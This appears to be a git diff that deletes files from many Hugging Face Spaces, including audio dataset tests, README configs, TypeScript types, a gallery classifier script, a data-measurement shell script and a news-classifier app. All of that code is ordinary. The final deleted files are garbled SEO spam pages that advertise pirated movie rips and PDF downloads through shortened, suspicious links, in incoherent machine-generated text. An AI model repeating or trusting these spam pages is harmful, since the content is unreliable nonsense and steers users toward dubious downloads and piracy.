sample_rate: int = 16_000, - channels: int = 1, - segment_duration: tp.Optional[float] = None, - num_examples: int = 10, - shuffle: bool = True, - return_info: bool = False): - root_dir = self._create_audio_files(root_name, total_num_examples, durations, sample_rate, channels) - dataset = AudioDataset.from_path(root_dir, - minimal_meta=True, - segment_duration=segment_duration, - num_samples=num_examples, - sample_rate=sample_rate, - channels=channels, - shuffle=shuffle, - return_info=return_info) - return dataset - - def test_dataset_full(self): - total_examples = 10 - min_duration, max_duration = 1., 4. - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), - sample_rate=sample_rate, channels=channels, segment_duration=None) - assert len(dataset) == total_examples - assert dataset.sample_rate == sample_rate - assert dataset.channels == channels - for idx in range(len(dataset)): - sample = dataset[idx] - assert sample.shape[0] == channels - assert sample.shape[1] <= int(max_duration * sample_rate) - assert sample.shape[1] >= int(min_duration * sample_rate) - - def test_dataset_segment(self): - total_examples = 10 - num_samples = 20 - min_duration, max_duration = 1., 4. - segment_duration = 1. - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples) - assert len(dataset) == num_samples - assert dataset.sample_rate == sample_rate - assert dataset.channels == channels - for idx in range(len(dataset)): - sample = dataset[idx] - assert sample.shape[0] == channels - assert sample.shape[1] == int(segment_duration * sample_rate) - - def test_dataset_equal_audio_and_segment_durations(self): - total_examples = 1 - num_samples = 2 - audio_duration = 1. - segment_duration = 1. - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=audio_duration, sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples) - assert len(dataset) == num_samples - assert dataset.sample_rate == sample_rate - assert dataset.channels == channels - for idx in range(len(dataset)): - sample = dataset[idx] - assert sample.shape[0] == channels - assert sample.shape[1] == int(segment_duration * sample_rate) - # the random seek_time adds variability on audio read - sample_1 = dataset[0] - sample_2 = dataset[1] - assert not torch.allclose(sample_1, sample_2) - - def test_dataset_samples(self): - total_examples = 1 - num_samples = 2 - audio_duration = 1. - segment_duration = 1. - sample_rate = 16_000 - channels = 1 - - create_dataset = partial( - self._create_audio_dataset, - 'dset', total_examples, durations=audio_duration, sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples, - ) - - dataset = create_dataset(shuffle=True) - # when shuffle = True, we have different inputs for the same index across epoch - sample_1 = dataset[0] - sample_2 = dataset[0] - assert not torch.allclose(sample_1, sample_2) - - dataset_noshuffle = create_dataset(shuffle=False) - # when shuffle = False, we have same inputs for the same index across epoch - sample_1 = dataset_noshuffle[0] - sample_2 = dataset_noshuffle[0] - assert torch.allclose(sample_1, sample_2) - - def test_dataset_return_info(self): - total_examples = 10 - num_samples = 20 - min_duration, max_duration = 1., 4. - segment_duration = 1. - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples, return_info=True) - assert len(dataset) == num_samples - assert dataset.sample_rate == sample_rate - assert dataset.channels == channels - for idx in range(len(dataset)): - sample, segment_info = dataset[idx] - assert sample.shape[0] == channels - assert sample.shape[1] == int(segment_duration * sample_rate) - assert segment_info.sample_rate == sample_rate - assert segment_info.total_frames == int(segment_duration * sample_rate) - assert segment_info.n_frames <= int(segment_duration * sample_rate) - assert segment_info.seek_time >= 0 - - def test_dataset_return_info_no_segment_duration(self): - total_examples = 10 - num_samples = 20 - min_duration, max_duration = 1., 4. - segment_duration = None - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples, return_info=True) - assert len(dataset) == total_examples - assert dataset.sample_rate == sample_rate - assert dataset.channels == channels - for idx in range(len(dataset)): - sample, segment_info = dataset[idx] - assert sample.shape[0] == channels - assert sample.shape[1] == segment_info.total_frames - assert segment_info.sample_rate == sample_rate - assert segment_info.n_frames <= segment_info.total_frames - - def test_dataset_collate_fn(self): - total_examples = 10 - num_samples = 20 - min_duration, max_duration = 1., 4. - segment_duration = 1. - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples, return_info=False) - batch_size = 4 - dataloader = DataLoader( - dataset, - batch_size=batch_size, - num_workers=0 - ) - for idx, batch in enumerate(dataloader): - assert batch.shape[0] == batch_size - - @pytest.mark.parametrize("segment_duration", [1.0, None]) - def test_dataset_with_meta_collate_fn(self, segment_duration): - total_examples = 10 - num_samples = 20 - min_duration, max_duration = 1., 4. - segment_duration = 1. - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples, return_info=True) - batch_size = 4 - dataloader = DataLoader( - dataset, - batch_size=batch_size, - collate_fn=dataset.collater, - num_workers=0 - ) - for idx, batch in enumerate(dataloader): - wav, infos = batch - assert wav.shape[0] == batch_size - assert len(infos) == batch_size - - @pytest.mark.parametrize("segment_duration,sample_on_weight,sample_on_duration,a_hist,b_hist,c_hist", [ - [1, True, True, 0.5, 0.5, 0.0], - [1, False, True, 0.25, 0.5, 0.25], - [1, True, False, 0.666, 0.333, 0.0], - [1, False, False, 0.333, 0.333, 0.333], - [None, False, False, 0.333, 0.333, 0.333]]) - def test_sample_with_weight(self, segment_duration, sample_on_weight, sample_on_duration, a_hist, b_hist, c_hist): - random.seed(1234) - rng = torch.Generator() - rng.manual_seed(1234) - - def _get_histogram(dataset, repetitions=20_000): - counts = {file_meta.path: 0. for file_meta in meta} - for _ in range(repetitions): - file_meta = dataset.sample_file(rng) - counts[file_meta.path] += 1 - return {name: count / repetitions for name, count in counts.items()} - - meta = [ - AudioMeta(path='a', duration=5, sample_rate=1, weight=2), - AudioMeta(path='b', duration=10, sample_rate=1, weight=None), - AudioMeta(path='c', duration=5, sample_rate=1, weight=0), - ] - dataset = AudioDataset( - meta, segment_duration=segment_duration, sample_on_weight=sample_on_weight, - sample_on_duration=sample_on_duration) - hist = _get_histogram(dataset) - assert math.isclose(hist['a'], a_hist, abs_tol=0.01) - assert math.isclose(hist['b'], b_hist, abs_tol=0.01) - assert math.isclose(hist['c'], c_hist, abs_tol=0.01) - - def test_meta_duration_filter_all(self): - meta = [ - AudioMeta(path='a', duration=5, sample_rate=1, weight=2), - AudioMeta(path='b', duration=10, sample_rate=1, weight=None), - AudioMeta(path='c', duration=5, sample_rate=1, weight=0), - ] - try: - AudioDataset(meta, segment_duration=11, min_segment_ratio=1) - assert False - except AssertionError: - assert True - - def test_meta_duration_filter_long(self): - meta = [ - AudioMeta(path='a', duration=5, sample_rate=1, weight=2), - AudioMeta(path='b', duration=10, sample_rate=1, weight=None), - AudioMeta(path='c', duration=5, sample_rate=1, weight=0), - ] - dataset = AudioDataset(meta, segment_duration=None, min_segment_ratio=1, max_audio_duration=7) - assert len(dataset) == 2 diff --git a/spaces/hemanthbylupudi/mygenAI/README.md b/spaces/hemanthbylupudi/mygenAI/README.md deleted file mode 100644 index 97e3a0c849658af7ff6d7915fa9da86b27678d57..0000000000000000000000000000000000000000 --- a/spaces/hemanthbylupudi/mygenAI/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: MygenAI -emoji: 📊 -colorFrom: red -colorTo: pink -sdk: gradio -sdk_version: 3.39.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/hs1l/Date/README.md b/spaces/hs1l/Date/README.md deleted file mode 100644 index d145c1fbff533cb91c3db0605c3d44e44be6f9ac..0000000000000000000000000000000000000000 --- a/spaces/hs1l/Date/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Date -emoji: 🐨 -colorFrom: yellow -colorTo: gray -sdk: streamlit -sdk_version: 1.15.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/huggingchat/chat-ui/src/lib/types/MessageUpdate.ts b/spaces/huggingchat/chat-ui/src/lib/types/MessageUpdate.ts deleted file mode 100644 index ceae608615504839a540406d45154c3995f4b9a4..0000000000000000000000000000000000000000 --- a/spaces/huggingchat/chat-ui/src/lib/types/MessageUpdate.ts +++ /dev/null @@ -1,39 +0,0 @@ -import type { WebSearchSource } from "./WebSearch"; - -export type FinalAnswer = { - type: "finalAnswer"; - text: string; -}; - -export type TextStreamUpdate = { - type: "stream"; - token: string; -}; - -export type AgentUpdate = { - type: "agent"; - agent: string; - content: string; - binary?: Blob; -}; - -export type WebSearchUpdate = { - type: "webSearch"; - messageType: "update" | "error" | "sources"; - message: string; - args?: string[]; - sources?: WebSearchSource[]; -}; - -export type StatusUpdate = { - type: "status"; - status: "started" | "pending" | "finished" | "error" | "title"; - message?: string; -}; - -export type MessageUpdate = - | FinalAnswer - | TextStreamUpdate - | AgentUpdate - | WebSearchUpdate - | StatusUpdate; diff --git a/spaces/huggingface-projects/InstructPix2Pix-Chatbot-ui/frontend/vite.config.ts b/spaces/huggingface-projects/InstructPix2Pix-Chatbot-ui/frontend/vite.config.ts deleted file mode 100644 index 16950342c1a41f60729f1abfcbbf67676c08e1bb..0000000000000000000000000000000000000000 --- a/spaces/huggingface-projects/InstructPix2Pix-Chatbot-ui/frontend/vite.config.ts +++ /dev/null @@ -1,8 +0,0 @@ -import { sveltekit } from '@sveltejs/kit/vite'; -import type { UserConfig } from 'vite'; - -const config: UserConfig = { - plugins: [sveltekit()] -}; - -export default config; diff --git a/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/1-8296099a.js b/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/1-8296099a.js deleted file mode 100644 index c2619ec6894b5b4666b45c66bd4238141e5688ec..0000000000000000000000000000000000000000 --- a/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/1-8296099a.js +++ /dev/null @@ -1 +0,0 @@ -import{default as t}from"../components/error.svelte-130ca573.js";export{t as component}; diff --git a/spaces/huggingface-projects/diffusers-gallery-bot/classifier.py b/spaces/huggingface-projects/diffusers-gallery-bot/classifier.py deleted file mode 100644 index b4edfa43f450d75b08fe66dc8cd4fd4f8ebe254e..0000000000000000000000000000000000000000 --- a/spaces/huggingface-projects/diffusers-gallery-bot/classifier.py +++ /dev/null @@ -1,70 +0,0 @@ -import os -import re -import requests -import json -import subprocess -from io import BytesIO -import uuid - -from math import ceil -from tqdm import tqdm -from pathlib import Path - -from db import Database - -DB_FOLDER = Path("diffusers-gallery-data") - -database = Database(DB_FOLDER) - - -CLASSIFIER_URL = "https://radames-aesthetic-style-nsfw-classifier.hf.space/run/inference" -ASSETS_URL = "https://d26smi9133w0oo.cloudfront.net/diffusers-gallery/" - - -def main(): - - with database.get_db() as db: - cursor = db.cursor() - cursor.execute(""" - SELECT * - FROM models - """) - results = list(cursor.fetchall()) - - for row in tqdm(results): - row_id = row['id'] - # keep json data on row_data - row_data = json.loads(row['data']) - print("updating row", row_id) - images = row_data['images'] - - # filter nones - images = [i for i in images if i is not None] - if len(images) > 0: - # classifying only the first image - images_urls = [ASSETS_URL + images[0]] - response = requests.post(CLASSIFIER_URL, json={"data": [ - {"urls": images_urls}, # json urls: list of images urls - False, # enable/disable gallery image output - None, # single image input - None, # files input - ]}).json() - - # data response is array data:[[{img0}, {img1}, {img2}...], Label, Gallery], - class_data = response['data'][0][0] - class_data_parsed = {row['label']: round( - row['score'], 3) for row in class_data} - - # update row data with classificator data - row_data['class'] = class_data_parsed - else: - row_data['class'] = {} - with database.get_db() as db: - cursor = db.cursor() - cursor.execute("UPDATE models SET data = ? WHERE id = ?", - [json.dumps(row_data), row_id]) - db.commit() - - -if __name__ == "__main__": - main() diff --git a/spaces/huggingface/data-measurements-tool/run.sh b/spaces/huggingface/data-measurements-tool/run.sh deleted file mode 100644 index ee9d16cf59621eeb762e4a9f3f46be17db934637..0000000000000000000000000000000000000000 --- a/spaces/huggingface/data-measurements-tool/run.sh +++ /dev/null @@ -1,112 +0,0 @@ -#!/usr/bin/env bash - - -python3 run_data_measurements.py --dataset="hate_speech18" --config="default" --split="train" --label_field="label" --feature="text" -python3 run_data_measurements.py --dataset="hate_speech_offensive" --config="default" --split="train" --label_field="label" --feature="tweet" - - -python3 run_data_measurements.py --dataset="imdb" --config="plain_text" --split="train" --label_field="label" --feature="text" -python3 run_data_measurements.py --dataset="imdb" --config="plain_text" --split="unsupervised" --label_field="label" --feature="text" - - -python3 run_data_measurements.py --dataset="glue" --config="cola" --split="train" --label_field="label" --feature="sentence" -python3 run_data_measurements.py --dataset="glue" --config="cola" --split="validation" --label_field="label" --feature="sentence" - -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="train" --label_field="label" --feature="hypothesis" -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="train" --label_field="label" --feature="premise" - -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="validation_matched" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="validation_matched" --label_field="label" --feature="hypothesis" -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="validation_mismatched" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="validation_mismatched" --label_field="label" --feature="hypothesis" - - -python3 run_data_measurements.py --dataset="glue" --config="mrpc" --split="train" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="mrpc" --split="train" --label_field="label" --feature="sentence2" -python3 run_data_measurements.py --dataset="glue" --config="mrpc" --split="validation" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="mrpc" --split="validation" --label_field="label" --feature="sentence2" - - -python3 run_data_measurements.py --dataset="glue" --config="rte" --split="train" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="rte" --split="train" --label_field="label" --feature="sentence2" -python3 run_data_measurements.py --dataset="glue" --config="rte" --split="validation" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="rte" --split="validation" --label_field="label" --feature="sentence2" - - -python3 run_data_measurements.py --dataset="glue" --config="stsb" --split="train" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="stsb" --split="train" --label_field="label" --feature="sentence2" -python3 run_data_measurements.py --dataset="glue" --config="stsb" --split="validation" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="stsb" --split="validation" --label_field="label" --feature="sentence2" - -python3 run_data_measurements.py --dataset="glue" --config="wnli" --split="train" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="wnli" --split="train" --label_field="label" --feature="sentence2" -python3 run_data_measurements.py --dataset="glue" --config="wnli" --split="validation" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="wnli" --split="validation" --label_field="label" --feature="sentence2" - -python3 run_data_measurements.py --dataset="glue" --config="sst2" --split="train" --label_field="label" --feature="sentence" -python3 run_data_measurements.py --dataset="glue" --config="sst2" --split="validation" --label_field="label" --feature="sentence" - - -python3 run_data_measurements.py --dataset="glue" --config="qnli" --split="train" --label_field="label" --feature="question" -python3 run_data_measurements.py --dataset="glue" --config="qnli" --split="train" --label_field="label" --feature="sentence" -python3 run_data_measurements.py --dataset="glue" --config="qnli" --split="validation" --label_field="label" --feature="question" -python3 run_data_measurements.py --dataset="glue" --config="qnli" --split="validation" --label_field="label" --feature="sentence" - - -python3 run_data_measurements.py --dataset="glue" --config="qqp" --split="train" --label_field="label" --feature="question1" -python3 run_data_measurements.py --dataset="glue" --config="qqp" --split="train" --label_field="label" --feature="question2" -python3 run_data_measurements.py --dataset="glue" --config="qqp" --split="validation" --label_field="label" --feature="question1" -python3 run_data_measurements.py --dataset="glue" --config="qqp" --split="validation" --label_field="label" --feature="question2" - -python3 run_data_measurements.py --dataset="glue" --config="mnli_matched" --split="validation" --label_field="label" --feature="hypothesis" -python3 run_data_measurements.py --dataset="glue" --config="mnli_matched" --split="validation" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="glue" --config="mnli_mismatched" --split="validation" --label_field="label" --feature="hypothesis" -python3 run_data_measurements.py --dataset="glue" --config="mnli_mismatched" --split="validation" --label_field="label" --feature="premise" - - -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-103-v1" --split="train" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-103-raw-v1" --split="train" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-2-v1" --split="train" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-2-raw-v1" --split="train" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-103-v1" --split="validation" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-103-raw-v1" --split="validation" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-2-v1" --split="validation" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-2-raw-v1" --split="validation" --feature="text" - - -# Superglue wsc? wic? rte? record? multirc? - -python3 run_data_measurements.py --dataset="super_glue" --config="boolq" --split="train" --label_field="label" --feature="question" -python3 run_data_measurements.py --dataset="super_glue" --config="boolq" --split="validation" --label_field="label" --feature="question" -python3 run_data_measurements.py --dataset="super_glue" --config="boolq" --split="train" --label_field="label" --feature="passage" -python3 run_data_measurements.py --dataset="super_glue" --config="boolq" --split="validation" --label_field="label" --feature="passage" - -python3 run_data_measurements.py --dataset="super_glue" --config="cb" --split="train" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="super_glue" --config="cb" --split="validation" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="super_glue" --config="cb" --split="train" --label_field="label" --feature="hypothesis" -python3 run_data_measurements.py --dataset="super_glue" --config="cb" --split="validation" --label_field="label" --feature="hypothesis" - - -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="train" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="validation" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="train" --label_field="label" --feature="choice1" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="validation" --label_field="label" --feature="choice1" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="train" --label_field="label" --feature="choice2" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="validation" --label_field="label" --feature="choice2" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="train" --label_field="label" --feature="question" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="validation" --label_field="label" --feature="question" - -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="train" --feature="context" -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="train" --feature="question" -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="train" --feature="title" -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="validation" --feature="context" -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="validation" --feature="question" -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="validation" --feature="title" - - -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="train" --feature="context" -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="train" --feature="question" -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="train" --feature="title" -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="validation" --feature="context" -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="validation" --feature="question" -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="validation" --feature="title" diff --git a/spaces/hugginglearners/malayalam-news-classify/app.py b/spaces/hugginglearners/malayalam-news-classify/app.py deleted file mode 100644 index 740a862d815e0b8ed9cc3eed7f96aae13286ab3a..0000000000000000000000000000000000000000 --- a/spaces/hugginglearners/malayalam-news-classify/app.py +++ /dev/null @@ -1,28 +0,0 @@ -from pathlib import Path -import gradio as gr -from huggingface_hub import from_pretrained_fastai - - -LABELS = Path('class_names.txt').read_text().splitlines() - - - -def predict(news_headline): - learner = from_pretrained_fastai("hugginglearners/ml-news-classify-fastai") - - probabilities = learner.predict(news_headline) - - return {LABELS[i]: probabilities[0]['probs'][i] for i in range(len(LABELS))} - -interface = gr.Interface( - predict, - inputs="textbox", - outputs='label', - theme="huggingface", - title="Malayalam News Classifier", - description="Try to classify news in മലയാളം? Input a few malayalam news headlines and verify whether the model categorized it appropriately!", - article = "

    Malayalam News Classifier | Demo Model

    ", - examples=[["ഓഹരി വിപണി തകരുമ്പോള്‍ നിക്ഷേപം എങ്ങനെ സുരക്ഷിതമാക്കാം"], ["വാര്‍ണറുടെ ഒറ്റക്കയ്യന്‍ ക്യാച്ചില്‍ അമ്പരന്ന് ക്രിക്കറ്റ് ലോകം"]], - # live=True, - share=True) -interface.launch(debug=True) diff --git a/spaces/hyxue/HiFiFace-inference-demo/arcface_torch/configs/wf12m_conflict_r50_pfc03_filter04.py b/spaces/hyxue/HiFiFace-inference-demo/arcface_torch/configs/wf12m_conflict_r50_pfc03_filter04.py deleted file mode 100644 index a766f4154bb801b57d0f9519748b63941e349330..0000000000000000000000000000000000000000 --- a/spaces/hyxue/HiFiFace-inference-demo/arcface_torch/configs/wf12m_conflict_r50_pfc03_filter04.py +++ /dev/null @@ -1,28 +0,0 @@ -from easydict import EasyDict as edict - -# make training faster -# our RAM is 256G -# mount -t tmpfs -o size=140G tmpfs /train_tmp - -config = edict() -config.margin_list = (1.0, 0.0, 0.4) -config.network = "r50" -config.resume = False -config.output = None -config.embedding_size = 512 -config.sample_rate = 0.3 -config.interclass_filtering_threshold = 0.4 -config.fp16 = True -config.weight_decay = 5e-4 -config.batch_size = 128 -config.optimizer = "sgd" -config.lr = 0.1 -config.verbose = 2000 -config.dali = False - -config.rec = "/train_tmp/WebFace12M_Conflict" -config.num_classes = 1017970 -config.num_image = 12720066 -config.num_epoch = 20 -config.warmup_epoch = config.num_epoch // 10 -config.val_targets = [] diff --git a/spaces/iamstolas/STOLAS/tests/kblob.ts b/spaces/iamstolas/STOLAS/tests/kblob.ts deleted file mode 100644 index 9e15b41c1c94a690beb61b23cdb42fc78767ccd2..0000000000000000000000000000000000000000 --- a/spaces/iamstolas/STOLAS/tests/kblob.ts +++ /dev/null @@ -1,27 +0,0 @@ -import FormData from 'form-data' - -import { fetch } from '@/lib/isomorphic' - -const formData = new FormData() - -const knowledgeRequest = {"imageInfo":{"url":"https://www.baidu.com/img/PCfb_5bf082d29588c07f842ccde3f97243ea.png"},"knowledgeRequest":{"invokedSkills":["ImageById"],"subscriptionId":"Bing.Chat.Multimodal","invokedSkillsRequestData":{"enableFaceBlur":true},"convoData":{"convoid":"51D|BingProdUnAuthenticatedUsers|E3DCA904FF236C67C3450163BCEC64CFF3F618CC8A4AFD75FD518F5ED0ADA080","convotone":"Creative"}}} - -formData.append('knowledgeRequest', JSON.stringify(knowledgeRequest)) - - -fetch('https://bing.vcanbb.top/images/kblob', - { - method: 'POST', - body: formData.getBuffer(), - headers: { - "sec-ch-ua": "\"Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"115\", \"Chromium\";v=\"115\"", - "sec-ch-ua-mobile": "?0", - "sec-ch-ua-platform": "\"Windows\"", - "Referer": "https://bing.vcanbb.top/web/index.html", - "Referrer-Policy": "origin-when-cross-origin", - ...formData.getHeaders() - } - - } -).then(res => res.text()) -.then(res => console.log('res', res)) diff --git a/spaces/imperialwool/funapi/routes/__init__.py b/spaces/imperialwool/funapi/routes/__init__.py deleted file mode 100644 index 678a90f40765a6caa462ea594f926732ea251128..0000000000000000000000000000000000000000 --- a/spaces/imperialwool/funapi/routes/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -from .jokes import * -from .ytApi import * -from .osuApi import * -from .helpers import * -from .holidays import * -from .siteRoutes import * \ No newline at end of file diff --git a/spaces/imseldrith/FaceSwap/roop/processors/__init__.py b/spaces/imseldrith/FaceSwap/roop/processors/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Inimey Ippadithaan (2015)[HDRip - X264 - 700MB - ESubs - Tamil] BETTER.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Inimey Ippadithaan (2015)[HDRip - X264 - 700MB - ESubs - Tamil] BETTER.md deleted file mode 100644 index 703f727a965bfce33342fda73349bb790321fb64..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Inimey Ippadithaan (2015)[HDRip - X264 - 700MB - ESubs - Tamil] BETTER.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Inimey Ippadithaan (2015)[HDRip - x264 - 700MB - ESubs - Tamil]


    Download ☆☆☆ https://urlin.us/2uEwgX



    -
    -Aaru Tamil Movie Online in HD - Einthusan Directed by Hari Music by Devi Sri Prasad. ... Inimey Ippadithaan (2015)[HDRip - X264 - 700MB - ESubs - Tamil]. 1fdad05405
    -
    -
    -

    diff --git a/spaces/inreVtussa/clothingai/Examples/500 Algoritmos Resolvidos Download Pdf.md b/spaces/inreVtussa/clothingai/Examples/500 Algoritmos Resolvidos Download Pdf.md deleted file mode 100644 index 55c05d63162f38e971694d38a6f2d714c634f001..0000000000000000000000000000000000000000 --- a/spaces/inreVtussa/clothingai/Examples/500 Algoritmos Resolvidos Download Pdf.md +++ /dev/null @@ -1,11 +0,0 @@ -
    -

    2. Ani. DOWNLOAD PDF. Introduo programao - 500 Algoritimos Resolvidos - Ani. Desde os anos de 1950, e csc, resolvido o inteiro e atual ciclo chamado CEDAN. Desempenho e seguran. nda. educacao, e ajuda do meio de, envolvido no estudo de vai para trabalhar, como ex. ciclo de suas observaçoes.

    -

    500 algoritmos resolvidos download pdf


    Download File ››››› https://tiurll.com/2uCkjd



    -

    Download arquivos em pdf enviados na rede iniciado e terminou automaticamente. Introduo programao. Introduo programao - 500 Algoritimos Resolvidos - Ani. Desempenho e seguran. nda. educacao, e ajuda do meio de, envolvido no estudo de vai para trabalhar, como ex. ciclo de suas observaçoes.

    -

    2. Ani. DOWNLOAD PDF. Introduo programao - 500 Algoritimos Resolvidos - Ani. Desempenho, e seguran. nda. educacao, e ajuda do meio de, envolvido no estudo de vai para trabalhar, como ex. ciclo de suas observaçoes.

    -

    Bandcamp Não possui mais para baixar.. 500 algoritmos resolvidos download pdf.
    Nas companhias oficiais não temos esse tipo de banco comum. Hiv HQ Hiv And I Applied For Adoption To Become Half Asian And Half White On U.S. Naturalization Form. English-Hindi

    -

    Hulu Plus mais facil download gratuido.com.. 500 algoritmos resolvidos download pdf. For Netflix there's no Windows 10, so it's a matter of getting. Drexel University. They offer a lot of nice courses.
    14.8 MB 5058 downloads.
    500 algoritmos resolvidos download pdf.
    17.5 MB 2039 downloads.

    -

    -

    285 downloads.. Ele descubriu que a aprendizagem das novas tecnologias melhorou a desempenho de seus algoritmos de treinamento.
    Ernest Borgman: The "In" Crowd,. 500 algoritmos resolvidos download pdf.
    13.1 MB 3196 downloads.
    500 algoritmos resolvidos download pdf.
    16.1 MB 1716 downloads.

    899543212b
    -
    -
    \ No newline at end of file diff --git a/spaces/inreVtussa/clothingai/Examples/Debonairmagazineindiapdfdownload.md b/spaces/inreVtussa/clothingai/Examples/Debonairmagazineindiapdfdownload.md deleted file mode 100644 index aa7cf96409e470da3ce0295b17ada95ac9266989..0000000000000000000000000000000000000000 --- a/spaces/inreVtussa/clothingai/Examples/Debonairmagazineindiapdfdownload.md +++ /dev/null @@ -1,8 +0,0 @@ - -

    The file debonairmagazineindiapdfdownload is provided only for demonstration purposes. debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload server side. 6. xbox 360 game starting button.b9bb5ebaedebonairmagazineindiapdfdownload wargas. dlies. debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload i started to do so, when i see the first start-up screen.

    -

    debonairmagazineindiapdfdownload.wargas. debonairmagazineindiapdfdownload.leverages.debonairmagazineindiapdfdownload debonairmagazineindiapdfdownload is provided only for demonstration purposes.

    -

    debonairmagazineindiapdfdownload


    Download ►►►►► https://tiurll.com/2uCjPU



    -

    debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload is provided only for demonstration purposes. debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload manual.debonairmagazineindiapdfdownload microsoft. xbox 360 game starting button.debonairmagazineindiapdfdownload holds its value, your data is safe.debonairmagazineindiapdfdownload by editing autocad files.debonairmagazineindiapdfdownload to the app. debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload debonairmagazineindiapdfdownload nothing to do with office.debonairmagazineindiapdfdownload debonairmagazineindiapdfdownload appears to be one of the most important that will affect the entire document.

    -

